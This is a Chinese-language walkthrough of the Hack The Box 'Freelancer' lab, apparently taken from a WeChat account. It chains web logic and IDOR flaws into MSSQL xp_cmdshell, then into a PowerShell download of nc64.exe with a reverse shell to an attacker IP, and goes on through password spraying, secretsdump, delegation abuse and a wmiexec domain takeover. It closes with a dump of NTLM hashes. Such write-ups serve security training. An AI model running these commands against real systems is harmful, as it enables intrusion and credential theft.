扫描靶机
nmap -p 1-65535 -T4 -A -v 10.10.11.5
得出了域名是freelancer.htb,使用工具进行扫描
得出了dc的域名是:dc.freelancer.htb,由于开启了88端口,使用kerbrute跑一下用户名
./kerbrute_linux_386 userenum -d freelancer.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc dc.freelancer.htbdthomasjgreensdavistaylorjmartinez
将其保存到一份users的列表,打开80端口看看
对其进行目录fuzz,可以跑出admin
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u "http://freelancer.htb/FUZZ" --hc 404 --hl 1246
打开admin看看
没有cms提示,回到主页面,右上面有三个按钮,两个注册一个登录,先注册一个员工账号
然后弹到登录界面
发现刚开始的账号没激活,其实这里有个逻辑漏洞,点击忘记密码
输入刚刚注册的信息,密码重置后重新登录,就这样成功登录进去
可以看到左边的选项栏里面有个qr code
扫描一下,可以得到一个网址
这个地址就是底下自己注册的用户,里面的MTAwMTQ=是一个base64编码,解码可以得到一个编号
得到一个id,测试一下其他功能,新建一份工作
在下面的Business的按钮可以得到job的地址
猜测id参数有个idor漏洞,将id改成1,可以得到其他人的job
没啥收获,回到二维码那里,重新生成一份二维码,然后替换二维码里面的base64参数。刚刚得知是一个id,改成1,并编写成base64
出现了错误,提示无效用户键位,说明是可以通过更改那里获取,换成2的base64,可以得到一个admin用户
点击右上方的按钮可以得知admin的名字是johnHalond
刚刚跑目录跑出了admin,直接进入admin后台
最底下有个sql终端,使用sql终端,输入命令,可以参考这篇文章
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/
-- 启用高级选项EXEC sp_configure 'show advanced options', 1;RECONFIGURE;-- 启用 xp_cmdshellEXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
先看看xp_cmdshell开了没
EXEC sp_configure 'xp_cmdshell';
可以看到已经开了,列出数据库里面的表格
SELECT TABLE_SCHEMA, TABLE_NAMEFROM INFORMATION_SCHEMA.TABLESWHERE TABLE_TYPE = 'BASE TABLE';
直接使用xp_cmdshell参数导出目录
EXEC xp_cmdshell 'dir C:UsersPublic';
那就上传个马子,然后运行
EXEC xp_cmdshell 'powershell -noprofile -Command "Invoke-WebRequest http://10.10.14.10:900/nc64.exe -OutFile C:UsersPublicnc64.exe" & C:UsersPublicnc64.exe 10.10.14.10 443 -e powershell'
成功反弹shell,然后上面搜索一下文件,在C:Userssql_svcDownloadsSQLEXPR-2019_x64_ENU可以找到一份sql-Configuration.INI文本,并将其读取
[OPTIONS]ACTION="Install"QUIET="True"FEATURES=SQLINSTANCENAME="SQLEXPRESS"INSTANCEID="SQLEXPRESS"RSSVCACCOUNT="NT ServiceReportServer$SQLEXPRESS"AGTSVCACCOUNT="NT AUTHORITYNETWORK SERVICE"AGTSVCSTARTUPTYPE="Manual"COMMFABRICPORT="0"COMMFABRICNETWORKLEVEL=""0"COMMFABRICENCRYPTION="0"MATRIXCMBRICKCOMMPORT="0"SQLSVCSTARTUPTYPE="Automatic"FILESTREAMLEVEL="0"ENABLERANU="False"SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"SQLSVCACCOUNT="FREELANCERsql_svc"SQLSVCPASSWORD="IL0v3ErenY3ager"SQLSYSADMINACCOUNTS="FREELANCERAdministrator"SECURITYMODE="SQL"SAPWD="t3mp0r@ryS@PWD"ADDCURRENTUSERASSQLADMIN="False"TCPENABLED="1"NPENABLED="1"BROWSERSVCSTARTUPTYPE="Automatic"IAcceptSQLServerLicenseTerms=True
上面有两个密码,将其保存,并将Users里面的用户也添加到users,然后对其进行密码喷洒
crackmapexec smb freelancer.htb -u users.txt -p pass.txt
跑出了mikasaAckerman对应IL0v3ErenY3ager,直接使用RunAscs登录(可以用cs的,但是报错~~)
.RunasCs.exe mikasaAckerman "IL0v3ErenY3ager" ".mal2.exe"
成功的拿到了user flag
底下有个压缩包下载下来并解压,里面还有一个mail文本
没什么用处,先看压缩包
里面有个dmp文件,可以使用这个工具导出
https://github.com/ufrisk/MemProcFS
https://github.com/ufrisk/MemProcFS/wiki/_Linux
./memprocfs -device MEMORY.DMP -mount /mnt
进去到sys那里可以找到一个用户名
搜索一下在registry/hive_files可以找到机器的SAM,SYSTEM,SECURITY,将其复制到本地,使用secretdump工具进行转储
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
成功的拿到了一份密码:PWN3D#l0rr@Armessa199 ,直接跑一下
crackmapexec winrm 10.10.11.5 -u users.txt -p "PWN3D#l0rr@Armessa199"
枚举出lorra199可以登录,直接登录winrm
evil-winrm -i 10.10.11.5 -u lorra199 -p "PWN3D#l0rr@Armessa199"
现在有了lorra199账户,直接使用bloodhound的python版本收集信息,记得同步服务器时间
bloodhound-python -u lorra199 -p "PWN3D#l0rr@Armessa199" -d freelancer.htb -ns 10.10.11.5 -c all
收集导入bloodhoud,然后打开,可以找到一个AD RECYCLE BIN的组
去到AD RECYCLE BIN组那里,中间有个Direct Members,他的直对成员是lorra199
说明lorra199就是AD RECYCLE BIN的组成员,然后AD RECYCLE BIN对DC机器有GenericWrite权限,该性质可以修改该账户的属性,包括设置或更改允许委派到的服务列表,这可以间接实现约束委派
使用impacket里面工具,也可以使用Powerview和Powermad,有asmi机制记得加密
首先新建一个机器
impacket-addcomputer freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199' -dc-ip 10.10.11.5
然后使用rbcd工具将新建的机器到dc的委派上,允许执行委派的机器在某些条件下冒充任何用户对目标机器进行操作
impacket-rbcd -delegate-from 'DESKTOP-68XXCRS9$' -delegate-to 'dc$' -dc-ip 10.10.11.5 -action write freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'
然后使用getST工具获得票据,该票据是新机器的
impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 freelancer.htb/DESKTOP-68XXCRS9$:'tf8SIoF2PkHphMQKQa2Z29KyG8bMoNZt'
导入票据,直接使用wmiexec工具登录到dc
KRB5CCNAME="Administrator@[email protected]" python3 wmiexec.py -no-pass -k freelancer.htb/[email protected]
成功拿到了admin
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::lorra199:1116:aad3b435b51404eeaad3b435b51404ee:67d4ae78a155aab3d4aa602da518c051:::maya.artmes:1124:aad3b435b51404eeaad3b435b51404ee:22db50a324b9a34ea898a290c1284e25:::michael.williams:1126:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::sdavis:1127:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::d.jones:1128:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::jen.brown:1129:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::taylor:1130:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::jmartinez:1131:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::olivia.garcia:1133:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::dthomas:1134:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::sophia.h:1135:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::Ethan.l:1138:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::wwalker:1141:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::jgreen:1142:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::evelyn.adams:1143:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::hking:1144:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::alex.hill:1145:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::samuel.turner:1146:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::ereed:1149:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::leon.sk:1151:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::carol.poland:1160:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::lkazanof:1162:aad3b435b51404eeaad3b435b51404ee:a26c33c2878b23df8b2da3d10e430a0f:::DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::DATAC2-2022$:1155:aad3b435b51404eeaad3b435b51404ee:007a710c0581c63104dad1e477c794e8:::WS1-WIIN10$:1156:aad3b435b51404eeaad3b435b51404ee:57e57c6a3f0f8fff74e8ab524871616b:::WS2-WIN11$:1157:aad3b435b51404eeaad3b435b51404ee:bf5267ee6236c86a3596f72f2ddef2da:::WS3-WIN11$:1158:aad3b435b51404eeaad3b435b51404ee:732c190482eea7b5e6777d898e352225:::DC2$:1159:aad3b435b51404eeaad3b435b51404ee:e1018953ffa39b3818212aba3f736c0f:::SETUPMACHINE$:8601:aad3b435b51404eeaad3b435b51404ee:f5912663ecf2c8cbda2a4218127d11fe:::DESKTOP-65M5XJZV$:11601:aad3b435b51404eeaad3b435b51404ee:27bb5ba183403118ab561fa106e8da8d:::
原文始发于微信公众号(Jiyou too beautiful):HTB-Freelancer笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论